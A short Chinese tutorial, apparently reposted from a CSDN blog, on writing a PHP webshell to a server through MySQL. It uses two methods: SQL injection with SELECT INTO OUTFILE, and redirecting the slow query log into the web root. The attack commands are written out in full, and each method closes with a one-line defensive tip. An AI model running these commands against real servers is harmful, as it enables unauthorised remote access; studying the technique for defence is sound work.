mysql写shell
短信预约 -IT技能 免费直播动态提醒
mysql写shell
一、Sql注入写shell
原理:select into outfile命令作用将查询结果输出保存到一个文件中
通过sql注入写shell的三个条件:
- 知道绝对路径
- Secure_file_priv开启
![1.png]()
一般Secure_file_priv=null,即不允许导入导出,在mysql中my.ini的[mysqld]中添加一行“Secure_file_priv=”,然后重启mysql,让配置生效。 - 目录要有写的权限
利用sql注入写入sql语句:select 1,2,“” into outfile “D:/phpstudy/phpstudy_pro/WWW/1.php”
Mysql中select into outfile命令作用将查询结果输出保存到一个文件中,以上语句会保存到1.php文件中
![2.png]()
随便什么刀连接一下
![3.png]()
Getshell成功
防护建议:利用sql注入漏洞结合数据库的输出文本功能形成getshell,对输入数据的严格审查过滤
二、慢日志查询写shell
知道mysql登录密码
2.phpmyadmin开放或者有机会操纵数据库
**原理:**查询超过10秒的语句会被写到慢查询日志文件中去,这样就可以进行文件写入。
查询慢日志查询功能是否开启
开启慢查询日志功能:set global slow_query_log=1;再次查询
更改日志文件地址:set global slow_query_log_file=‘D:\phpstudy\phpstudy_pro\WWW\3.php’;查询
查询内容并超过:select ‘’ or sleep(11);
连它
防护建议:利用mysql正常的功能输出木马文件,弱密码要不得
来源地址:https://blog.csdn.net/weixin_47385895/article/details/126471862
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
![[mysql]mysql8修改root密码](https://static.528045.com/imgs/4.jpg?imageMogr2/format/webp/blur/1x0/quality/35)
